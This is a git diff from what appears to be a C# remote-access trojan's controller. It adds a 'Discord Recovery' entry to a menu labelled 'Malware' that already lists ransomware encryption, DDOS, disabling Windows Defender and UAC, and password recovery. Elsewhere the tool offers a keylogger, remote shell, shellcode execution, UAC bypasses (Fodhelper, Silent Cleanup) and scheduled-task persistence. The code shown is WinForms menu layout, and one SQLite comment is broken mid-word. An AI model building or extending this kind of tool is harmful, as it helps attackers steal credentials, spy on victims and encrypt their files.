<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
|
||||
|
||||
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
|
||||
<ILMergeCopyAttributes></ILMergeCopyAttributes>
|
||||
|
||||
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
|
||||
<ILMergeDebugInfo></ILMergeDebugInfo>
|
||||
|
||||
<!-- Target assembly will be delay signed -->
|
||||
<ILMergeDelaySign></ILMergeDelaySign>
|
||||
|
||||
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
|
||||
<ILMergeInternalize></ILMergeInternalize>
|
||||
|
||||
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
|
||||
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
|
||||
|
||||
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
|
||||
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
|
||||
|
||||
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
|
||||
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
|
||||
|
||||
<!-- Types with the same name are all merged into a single type in the target assembly -->
|
||||
<ILMergeUnionMerge></ILMergeUnionMerge>
|
||||
|
||||
<!-- The version of the target framework, default 40 (works for 45 too) -->
|
||||
<ILTargetPlatform></ILTargetPlatform>
|
||||
</PropertyGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
# this file contains the partial list of the merged assemblies in the merge order
|
||||
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
|
||||
# and finetune merge order to your satisfaction
|
||||
|
BIN
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll
vendored
Normal file
BIN
Plugin/Discord/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll
vendored
Normal file
Binary file not shown.
|
@ -601,7 +601,8 @@ public Pgno[] aOverflow; /* Cache of overflow page locations */
|
|||
** seek the cursor to the saved position.
|
||||
**
|
||||
** CURSOR_FAULT:
|
||||
** A unrecoverable error (an I/O error or a malloc failure) has occurred
|
||||
** A unrecover
|
||||
*able error (an I/O error or a malloc failure) has occurred
|
||||
** on a different connection that shares the BtShared cache with this
|
||||
** cursor. The error has left the cache in an inconsistent state.
|
||||
** Do nothing else with this cursor. Any attempt to use the cursor
|
||||
|
|
|
@ -48,6 +48,7 @@
|
|||
- Disable Windows Defender
|
||||
- Disable UAC
|
||||
- Password recovery
|
||||
- Discord Recovery
|
||||
- Open CD
|
||||
- Lock screen
|
||||
- Client shutdown/restart/upgrade/uninstall
|
||||
|
|
|
@ -67,6 +67,7 @@
|
|||
this.ClientControlToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.StopToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.RestartToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.noSystemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.UpdateToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.UninstallToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.ClientFolderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
|
@ -149,7 +150,7 @@
|
|||
this.columnHeader1 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
|
||||
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
|
||||
this.ConnectTimeout = new System.Windows.Forms.Timer(this.components);
|
||||
this.noSystemToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.DiscordRecoveryToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||
this.contextMenuClient.SuspendLayout();
|
||||
this.statusStrip1.SuspendLayout();
|
||||
this.contextMenuLogs.SuspendLayout();
|
||||
|
@ -201,56 +202,56 @@
|
|||
// RemoteShellToolStripMenuItem
|
||||
//
|
||||
this.RemoteShellToolStripMenuItem.Name = "RemoteShellToolStripMenuItem";
|
||||
this.RemoteShellToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.RemoteShellToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.RemoteShellToolStripMenuItem.Text = "Remote Shell";
|
||||
this.RemoteShellToolStripMenuItem.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem_Click);
|
||||
//
|
||||
// RemoteScreenToolStripMenuItem
|
||||
//
|
||||
this.RemoteScreenToolStripMenuItem.Name = "RemoteScreenToolStripMenuItem";
|
||||
this.RemoteScreenToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.RemoteScreenToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.RemoteScreenToolStripMenuItem.Text = "Remote Screen";
|
||||
this.RemoteScreenToolStripMenuItem.Click += new System.EventHandler(this.RemoteScreenToolStripMenuItem_Click);
|
||||
//
|
||||
// RemoteCameraToolStripMenuItem
|
||||
//
|
||||
this.RemoteCameraToolStripMenuItem.Name = "RemoteCameraToolStripMenuItem";
|
||||
this.RemoteCameraToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.RemoteCameraToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.RemoteCameraToolStripMenuItem.Text = "Remote Camera";
|
||||
this.RemoteCameraToolStripMenuItem.Click += new System.EventHandler(this.RemoteCameraToolStripMenuItem_Click);
|
||||
//
|
||||
// remoteRegeditToolStripMenuItem
|
||||
//
|
||||
this.remoteRegeditToolStripMenuItem.Name = "remoteRegeditToolStripMenuItem";
|
||||
this.remoteRegeditToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.remoteRegeditToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.remoteRegeditToolStripMenuItem.Text = "Remote Regedit";
|
||||
this.remoteRegeditToolStripMenuItem.Click += new System.EventHandler(this.remoteRegeditToolStripMenuItem_Click);
|
||||
//
|
||||
// FileManagerToolStripMenuItem1
|
||||
//
|
||||
this.FileManagerToolStripMenuItem1.Name = "FileManagerToolStripMenuItem1";
|
||||
this.FileManagerToolStripMenuItem1.Size = new System.Drawing.Size(198, 22);
|
||||
this.FileManagerToolStripMenuItem1.Size = new System.Drawing.Size(186, 22);
|
||||
this.FileManagerToolStripMenuItem1.Text = "File Manager";
|
||||
this.FileManagerToolStripMenuItem1.Click += new System.EventHandler(this.FileManagerToolStripMenuItem1_Click);
|
||||
//
|
||||
// ProcessManagerToolStripMenuItem
|
||||
//
|
||||
this.ProcessManagerToolStripMenuItem.Name = "ProcessManagerToolStripMenuItem";
|
||||
this.ProcessManagerToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.ProcessManagerToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.ProcessManagerToolStripMenuItem.Text = "Process Manager";
|
||||
this.ProcessManagerToolStripMenuItem.Click += new System.EventHandler(this.ProcessManagerToolStripMenuItem_Click);
|
||||
//
|
||||
// netstatToolStripMenuItem
|
||||
//
|
||||
this.netstatToolStripMenuItem.Name = "netstatToolStripMenuItem";
|
||||
this.netstatToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.netstatToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.netstatToolStripMenuItem.Text = "Netstat";
|
||||
this.netstatToolStripMenuItem.Click += new System.EventHandler(this.netstatToolStripMenuItem_Click);
|
||||
//
|
||||
// RecordToolStripMenuItem
|
||||
//
|
||||
this.RecordToolStripMenuItem.Name = "RecordToolStripMenuItem";
|
||||
this.RecordToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.RecordToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.RecordToolStripMenuItem.Text = "Record";
|
||||
this.RecordToolStripMenuItem.Click += new System.EventHandler(this.RecordToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -260,20 +261,20 @@
|
|||
this.StartToolStripMenuItem1,
|
||||
this.StopToolStripMenuItem2});
|
||||
this.ProgramNotificationToolStripMenuItem.Name = "ProgramNotificationToolStripMenuItem";
|
||||
this.ProgramNotificationToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.ProgramNotificationToolStripMenuItem.Size = new System.Drawing.Size(186, 22);
|
||||
this.ProgramNotificationToolStripMenuItem.Text = "Program Notification";
|
||||
//
|
||||
// StartToolStripMenuItem1
|
||||
//
|
||||
this.StartToolStripMenuItem1.Name = "StartToolStripMenuItem1";
|
||||
this.StartToolStripMenuItem1.Size = new System.Drawing.Size(103, 22);
|
||||
this.StartToolStripMenuItem1.Size = new System.Drawing.Size(98, 22);
|
||||
this.StartToolStripMenuItem1.Text = "Start";
|
||||
this.StartToolStripMenuItem1.Click += new System.EventHandler(this.StartToolStripMenuItem1_Click);
|
||||
//
|
||||
// StopToolStripMenuItem2
|
||||
//
|
||||
this.StopToolStripMenuItem2.Name = "StopToolStripMenuItem2";
|
||||
this.StopToolStripMenuItem2.Size = new System.Drawing.Size(103, 22);
|
||||
this.StopToolStripMenuItem2.Size = new System.Drawing.Size(98, 22);
|
||||
this.StopToolStripMenuItem2.Text = "Stop";
|
||||
this.StopToolStripMenuItem2.Click += new System.EventHandler(this.StopToolStripMenuItem2_Click);
|
||||
//
|
||||
|
@ -299,76 +300,76 @@
|
|||
this.SendFileToDiskToolStripMenuItem,
|
||||
this.SendFileToMemoryToolStripMenuItem});
|
||||
this.SendFileToolStripMenuItem1.Name = "SendFileToolStripMenuItem1";
|
||||
this.SendFileToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
|
||||
this.SendFileToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.SendFileToolStripMenuItem1.Text = "Send File";
|
||||
//
|
||||
// fromUrlToolStripMenuItem
|
||||
//
|
||||
this.fromUrlToolStripMenuItem.Name = "fromUrlToolStripMenuItem";
|
||||
this.fromUrlToolStripMenuItem.Size = new System.Drawing.Size(200, 22);
|
||||
this.fromUrlToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.fromUrlToolStripMenuItem.Text = "From Url";
|
||||
this.fromUrlToolStripMenuItem.Click += new System.EventHandler(this.fromUrlToolStripMenuItem_Click);
|
||||
//
|
||||
// SendFileToDiskToolStripMenuItem
|
||||
//
|
||||
this.SendFileToDiskToolStripMenuItem.Name = "SendFileToDiskToolStripMenuItem";
|
||||
this.SendFileToDiskToolStripMenuItem.Size = new System.Drawing.Size(200, 22);
|
||||
this.SendFileToDiskToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.SendFileToDiskToolStripMenuItem.Text = "Send File To Disk";
|
||||
this.SendFileToDiskToolStripMenuItem.Click += new System.EventHandler(this.SendFileToDiskToolStripMenuItem_Click);
|
||||
//
|
||||
// SendFileToMemoryToolStripMenuItem
|
||||
//
|
||||
this.SendFileToMemoryToolStripMenuItem.Name = "SendFileToMemoryToolStripMenuItem";
|
||||
this.SendFileToMemoryToolStripMenuItem.Size = new System.Drawing.Size(200, 22);
|
||||
this.SendFileToMemoryToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.SendFileToMemoryToolStripMenuItem.Text = "Send File To Memory";
|
||||
this.SendFileToMemoryToolStripMenuItem.Click += new System.EventHandler(this.SendFileToMemoryToolStripMenuItem_Click);
|
||||
//
|
||||
// runShellcodeToolStripMenuItem
|
||||
//
|
||||
this.runShellcodeToolStripMenuItem.Name = "runShellcodeToolStripMenuItem";
|
||||
this.runShellcodeToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.runShellcodeToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.runShellcodeToolStripMenuItem.Text = "Run Shellcode";
|
||||
this.runShellcodeToolStripMenuItem.Click += new System.EventHandler(this.runShellcodeToolStripMenuItem_Click);
|
||||
//
|
||||
// MessageBoxToolStripMenuItem
|
||||
//
|
||||
this.MessageBoxToolStripMenuItem.Name = "MessageBoxToolStripMenuItem";
|
||||
this.MessageBoxToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.MessageBoxToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.MessageBoxToolStripMenuItem.Text = "MessageBox";
|
||||
this.MessageBoxToolStripMenuItem.Click += new System.EventHandler(this.MessageBoxToolStripMenuItem_Click);
|
||||
//
|
||||
// ChatToolStripMenuItem1
|
||||
//
|
||||
this.ChatToolStripMenuItem1.Name = "ChatToolStripMenuItem1";
|
||||
this.ChatToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
|
||||
this.ChatToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.ChatToolStripMenuItem1.Text = "Chat";
|
||||
this.ChatToolStripMenuItem1.Click += new System.EventHandler(this.ChatToolStripMenuItem1_Click);
|
||||
//
|
||||
// VisteWebsiteToolStripMenuItem1
|
||||
//
|
||||
this.VisteWebsiteToolStripMenuItem1.Name = "VisteWebsiteToolStripMenuItem1";
|
||||
this.VisteWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
|
||||
this.VisteWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.VisteWebsiteToolStripMenuItem1.Text = "Viste Website";
|
||||
this.VisteWebsiteToolStripMenuItem1.Click += new System.EventHandler(this.VisteWebsiteToolStripMenuItem1_Click);
|
||||
//
|
||||
// ChangeWallpaperToolStripMenuItem1
|
||||
//
|
||||
this.ChangeWallpaperToolStripMenuItem1.Name = "ChangeWallpaperToolStripMenuItem1";
|
||||
this.ChangeWallpaperToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
|
||||
this.ChangeWallpaperToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.ChangeWallpaperToolStripMenuItem1.Text = "Change Wallpaper";
|
||||
this.ChangeWallpaperToolStripMenuItem1.Click += new System.EventHandler(this.ChangeWallpaperToolStripMenuItem1_Click);
|
||||
//
|
||||
// KeyloggerToolStripMenuItem1
|
||||
//
|
||||
this.KeyloggerToolStripMenuItem1.Name = "KeyloggerToolStripMenuItem1";
|
||||
this.KeyloggerToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
|
||||
this.KeyloggerToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.KeyloggerToolStripMenuItem1.Text = "Keylogger";
|
||||
this.KeyloggerToolStripMenuItem1.Click += new System.EventHandler(this.KeyloggerToolStripMenuItem1_Click);
|
||||
//
|
||||
// FileSearchToolStripMenuItem
|
||||
//
|
||||
this.FileSearchToolStripMenuItem.Name = "FileSearchToolStripMenuItem";
|
||||
this.FileSearchToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
|
||||
this.FileSearchToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.FileSearchToolStripMenuItem.Text = "File Search";
|
||||
this.FileSearchToolStripMenuItem.Click += new System.EventHandler(this.FileSearchToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -379,6 +380,7 @@
|
|||
this.RansomwareToolStripMenuItem,
|
||||
this.DisableWDToolStripMenuItem,
|
||||
this.PasswordRecoveryToolStripMenuItem,
|
||||
this.DiscordRecoveryToolStripMenuItem,
|
||||
this.DisableUACToolStripMenuItem});
|
||||
this.MalwareToolStripMenuItem.Name = "MalwareToolStripMenuItem";
|
||||
this.MalwareToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
|
@ -387,7 +389,7 @@
|
|||
// dDOSToolStripMenuItem
|
||||
//
|
||||
this.dDOSToolStripMenuItem.Name = "dDOSToolStripMenuItem";
|
||||
this.dDOSToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.dDOSToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.dDOSToolStripMenuItem.Text = "DDOS";
|
||||
this.dDOSToolStripMenuItem.Click += new System.EventHandler(this.dDOSToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -397,41 +399,41 @@
|
|||
this.EncryptToolStripMenuItem,
|
||||
this.DecryptToolStripMenuItem});
|
||||
this.RansomwareToolStripMenuItem.Name = "RansomwareToolStripMenuItem";
|
||||
this.RansomwareToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.RansomwareToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.RansomwareToolStripMenuItem.Text = "Ransomware";
|
||||
//
|
||||
// EncryptToolStripMenuItem
|
||||
//
|
||||
this.EncryptToolStripMenuItem.Name = "EncryptToolStripMenuItem";
|
||||
this.EncryptToolStripMenuItem.Size = new System.Drawing.Size(121, 22);
|
||||
this.EncryptToolStripMenuItem.Size = new System.Drawing.Size(115, 22);
|
||||
this.EncryptToolStripMenuItem.Text = "Encrypt";
|
||||
this.EncryptToolStripMenuItem.Click += new System.EventHandler(this.EncryptToolStripMenuItem_Click);
|
||||
//
|
||||
// DecryptToolStripMenuItem
|
||||
//
|
||||
this.DecryptToolStripMenuItem.Name = "DecryptToolStripMenuItem";
|
||||
this.DecryptToolStripMenuItem.Size = new System.Drawing.Size(121, 22);
|
||||
this.DecryptToolStripMenuItem.Size = new System.Drawing.Size(115, 22);
|
||||
this.DecryptToolStripMenuItem.Text = "Decrypt";
|
||||
this.DecryptToolStripMenuItem.Click += new System.EventHandler(this.DecryptToolStripMenuItem_Click);
|
||||
//
|
||||
// DisableWDToolStripMenuItem
|
||||
//
|
||||
this.DisableWDToolStripMenuItem.Name = "DisableWDToolStripMenuItem";
|
||||
this.DisableWDToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.DisableWDToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.DisableWDToolStripMenuItem.Text = "Disable WD";
|
||||
this.DisableWDToolStripMenuItem.Click += new System.EventHandler(this.DisableWDToolStripMenuItem_Click);
|
||||
//
|
||||
// PasswordRecoveryToolStripMenuItem
|
||||
//
|
||||
this.PasswordRecoveryToolStripMenuItem.Name = "PasswordRecoveryToolStripMenuItem";
|
||||
this.PasswordRecoveryToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.PasswordRecoveryToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.PasswordRecoveryToolStripMenuItem.Text = "Password Recovery";
|
||||
this.PasswordRecoveryToolStripMenuItem.Click += new System.EventHandler(this.PasswordRecoveryToolStripMenuItem_Click);
|
||||
//
|
||||
// DisableUACToolStripMenuItem
|
||||
//
|
||||
this.DisableUACToolStripMenuItem.Name = "DisableUACToolStripMenuItem";
|
||||
this.DisableUACToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.DisableUACToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.DisableUACToolStripMenuItem.Text = "Disable UAC";
|
||||
this.DisableUACToolStripMenuItem.Click += new System.EventHandler(this.DisableUACToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -460,35 +462,42 @@
|
|||
// StopToolStripMenuItem1
|
||||
//
|
||||
this.StopToolStripMenuItem1.Name = "StopToolStripMenuItem1";
|
||||
this.StopToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.StopToolStripMenuItem1.Size = new System.Drawing.Size(141, 22);
|
||||
this.StopToolStripMenuItem1.Text = "Stop";
|
||||
this.StopToolStripMenuItem1.Click += new System.EventHandler(this.StopToolStripMenuItem1_Click);
|
||||
//
|
||||
// RestartToolStripMenuItem1
|
||||
//
|
||||
this.RestartToolStripMenuItem1.Name = "RestartToolStripMenuItem1";
|
||||
this.RestartToolStripMenuItem1.Size = new System.Drawing.Size(180, 22);
|
||||
this.RestartToolStripMenuItem1.Size = new System.Drawing.Size(141, 22);
|
||||
this.RestartToolStripMenuItem1.Text = "Restart";
|
||||
this.RestartToolStripMenuItem1.Click += new System.EventHandler(this.RestartToolStripMenuItem1_Click);
|
||||
//
|
||||
// noSystemToolStripMenuItem
|
||||
//
|
||||
this.noSystemToolStripMenuItem.Name = "noSystemToolStripMenuItem";
|
||||
this.noSystemToolStripMenuItem.Size = new System.Drawing.Size(141, 22);
|
||||
this.noSystemToolStripMenuItem.Text = "No System";
|
||||
this.noSystemToolStripMenuItem.Click += new System.EventHandler(this.noSystemToolStripMenuItem_Click);
|
||||
//
|
||||
// UpdateToolStripMenuItem
|
||||
//
|
||||
this.UpdateToolStripMenuItem.Name = "UpdateToolStripMenuItem";
|
||||
this.UpdateToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.UpdateToolStripMenuItem.Size = new System.Drawing.Size(141, 22);
|
||||
this.UpdateToolStripMenuItem.Text = "Update";
|
||||
this.UpdateToolStripMenuItem.Click += new System.EventHandler(this.UpdateToolStripMenuItem_Click);
|
||||
//
|
||||
// UninstallToolStripMenuItem
|
||||
//
|
||||
this.UninstallToolStripMenuItem.Name = "UninstallToolStripMenuItem";
|
||||
this.UninstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.UninstallToolStripMenuItem.Size = new System.Drawing.Size(141, 22);
|
||||
this.UninstallToolStripMenuItem.Text = "Uninstall";
|
||||
this.UninstallToolStripMenuItem.Click += new System.EventHandler(this.UninstallToolStripMenuItem_Click);
|
||||
//
|
||||
// ClientFolderToolStripMenuItem
|
||||
//
|
||||
this.ClientFolderToolStripMenuItem.Name = "ClientFolderToolStripMenuItem";
|
||||
this.ClientFolderToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.ClientFolderToolStripMenuItem.Size = new System.Drawing.Size(141, 22);
|
||||
this.ClientFolderToolStripMenuItem.Text = "Client Folder";
|
||||
this.ClientFolderToolStripMenuItem.Click += new System.EventHandler(this.ClientFolderToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -505,21 +514,21 @@
|
|||
// ShutDownToolStripMenuItem
|
||||
//
|
||||
this.ShutDownToolStripMenuItem.Name = "ShutDownToolStripMenuItem";
|
||||
this.ShutDownToolStripMenuItem.Size = new System.Drawing.Size(138, 22);
|
||||
this.ShutDownToolStripMenuItem.Size = new System.Drawing.Size(132, 22);
|
||||
this.ShutDownToolStripMenuItem.Text = "Shut Down";
|
||||
this.ShutDownToolStripMenuItem.Click += new System.EventHandler(this.ShutDownToolStripMenuItem_Click);
|
||||
//
|
||||
// RebootToolStripMenuItem
|
||||
//
|
||||
this.RebootToolStripMenuItem.Name = "RebootToolStripMenuItem";
|
||||
this.RebootToolStripMenuItem.Size = new System.Drawing.Size(138, 22);
|
||||
this.RebootToolStripMenuItem.Size = new System.Drawing.Size(132, 22);
|
||||
this.RebootToolStripMenuItem.Text = "Reboot";
|
||||
this.RebootToolStripMenuItem.Click += new System.EventHandler(this.RebootToolStripMenuItem_Click);
|
||||
//
|
||||
// LogoutToolStripMenuItem
|
||||
//
|
||||
this.LogoutToolStripMenuItem.Name = "LogoutToolStripMenuItem";
|
||||
this.LogoutToolStripMenuItem.Size = new System.Drawing.Size(138, 22);
|
||||
this.LogoutToolStripMenuItem.Size = new System.Drawing.Size(132, 22);
|
||||
this.LogoutToolStripMenuItem.Text = "Logout";
|
||||
this.LogoutToolStripMenuItem.Click += new System.EventHandler(this.LogoutToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -537,28 +546,28 @@
|
|||
// SilentCleanupToolStripMenuItem
|
||||
//
|
||||
this.SilentCleanupToolStripMenuItem.Name = "SilentCleanupToolStripMenuItem";
|
||||
this.SilentCleanupToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.SilentCleanupToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.SilentCleanupToolStripMenuItem.Text = "Silent Cleanup";
|
||||
this.SilentCleanupToolStripMenuItem.Click += new System.EventHandler(this.SilentCleanupToolStripMenuItem_Click);
|
||||
//
|
||||
// FodhelperToolStripMenuItem
|
||||
//
|
||||
this.FodhelperToolStripMenuItem.Name = "FodhelperToolStripMenuItem";
|
||||
this.FodhelperToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.FodhelperToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.FodhelperToolStripMenuItem.Text = "Fodhelper";
|
||||
this.FodhelperToolStripMenuItem.Click += new System.EventHandler(this.FodhelperToolStripMenuItem_Click);
|
||||
//
|
||||
// RunasToolStripMenuItem
|
||||
//
|
||||
this.RunasToolStripMenuItem.Name = "RunasToolStripMenuItem";
|
||||
this.RunasToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.RunasToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.RunasToolStripMenuItem.Text = "Runas";
|
||||
this.RunasToolStripMenuItem.Click += new System.EventHandler(this.RunasToolStripMenuItem_Click);
|
||||
//
|
||||
// CompMgmtLauncherToolStripMenuItem
|
||||
//
|
||||
this.CompMgmtLauncherToolStripMenuItem.Name = "CompMgmtLauncherToolStripMenuItem";
|
||||
this.CompMgmtLauncherToolStripMenuItem.Size = new System.Drawing.Size(198, 22);
|
||||
this.CompMgmtLauncherToolStripMenuItem.Size = new System.Drawing.Size(189, 22);
|
||||
this.CompMgmtLauncherToolStripMenuItem.Text = "CompMgmtLauncher";
|
||||
this.CompMgmtLauncherToolStripMenuItem.Click += new System.EventHandler(this.CompMgmtLauncherToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -576,28 +585,28 @@
|
|||
// SchtaskInstallToolStripMenuItem
|
||||
//
|
||||
this.SchtaskInstallToolStripMenuItem.Name = "SchtaskInstallToolStripMenuItem";
|
||||
this.SchtaskInstallToolStripMenuItem.Size = new System.Drawing.Size(173, 22);
|
||||
this.SchtaskInstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.SchtaskInstallToolStripMenuItem.Text = "Schtask Install";
|
||||
this.SchtaskInstallToolStripMenuItem.Click += new System.EventHandler(this.SchtaskInstallToolStripMenuItem_Click);
|
||||
//
|
||||
// SchtaskUninstallToolStripMenuItem
|
||||
//
|
||||
this.SchtaskUninstallToolStripMenuItem.Name = "SchtaskUninstallToolStripMenuItem";
|
||||
this.SchtaskUninstallToolStripMenuItem.Size = new System.Drawing.Size(173, 22);
|
||||
this.SchtaskUninstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.SchtaskUninstallToolStripMenuItem.Text = "Schtask Uninstall";
|
||||
this.SchtaskUninstallToolStripMenuItem.Click += new System.EventHandler(this.SchtaskUninstallToolStripMenuItem_Click);
|
||||
//
|
||||
// normalInstallToolStripMenuItem
|
||||
//
|
||||
this.normalInstallToolStripMenuItem.Name = "normalInstallToolStripMenuItem";
|
||||
this.normalInstallToolStripMenuItem.Size = new System.Drawing.Size(173, 22);
|
||||
this.normalInstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.normalInstallToolStripMenuItem.Text = "Normal Install";
|
||||
this.normalInstallToolStripMenuItem.Click += new System.EventHandler(this.normalInstallToolStripMenuItem_Click);
|
||||
//
|
||||
// normalUninstallToolStripMenuItem
|
||||
//
|
||||
this.normalUninstallToolStripMenuItem.Name = "normalUninstallToolStripMenuItem";
|
||||
this.normalUninstallToolStripMenuItem.Size = new System.Drawing.Size(173, 22);
|
||||
this.normalUninstallToolStripMenuItem.Size = new System.Drawing.Size(180, 22);
|
||||
this.normalUninstallToolStripMenuItem.Text = "Normal Uninstall";
|
||||
this.normalUninstallToolStripMenuItem.Click += new System.EventHandler(this.normalUninstallToolStripMenuItem_Click);
|
||||
//
|
||||
|
@ -621,7 +630,7 @@
|
|||
this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
||||
this.toolStripStatusLabel1,
|
||||
this.toolStripStatusLabel2});
|
||||
this.statusStrip1.Location = new System.Drawing.Point(0, 401);
|
||||
this.statusStrip1.Location = new System.Drawing.Point(0, 436);
|
||||
this.statusStrip1.Name = "statusStrip1";
|
||||
this.statusStrip1.Padding = new System.Windows.Forms.Padding(1, 0, 9, 0);
|
||||
this.statusStrip1.Size = new System.Drawing.Size(867, 22);
|
||||
|
@ -631,13 +640,13 @@
|
|||
// toolStripStatusLabel1
|
||||
//
|
||||
this.toolStripStatusLabel1.Name = "toolStripStatusLabel1";
|
||||
this.toolStripStatusLabel1.Size = new System.Drawing.Size(17, 17);
|
||||
this.toolStripStatusLabel1.Size = new System.Drawing.Size(16, 17);
|
||||
this.toolStripStatusLabel1.Text = "...";
|
||||
//
|
||||
// toolStripStatusLabel2
|
||||
//
|
||||
this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
|
||||
this.toolStripStatusLabel2.Size = new System.Drawing.Size(155, 17);
|
||||
this.toolStripStatusLabel2.Size = new System.Drawing.Size(130, 17);
|
||||
this.toolStripStatusLabel2.Text = " Notification";
|
||||
this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
|
||||
//
|
||||
|
@ -660,12 +669,12 @@
|
|||
this.cLEARToolStripMenuItem});
|
||||
this.contextMenuLogs.Name = "contextMenuLogs";
|
||||
this.contextMenuLogs.ShowImageMargin = false;
|
||||
this.contextMenuLogs.Size = new System.Drawing.Size(82, 26);
|
||||
this.contextMenuLogs.Size = new System.Drawing.Size(77, 26);
|
||||
//
|
||||
// cLEARToolStripMenuItem
|
||||
//
|
||||
this.cLEARToolStripMenuItem.Name = "cLEARToolStripMenuItem";
|
||||
this.cLEARToolStripMenuItem.Size = new System.Drawing.Size(81, 22);
|
||||
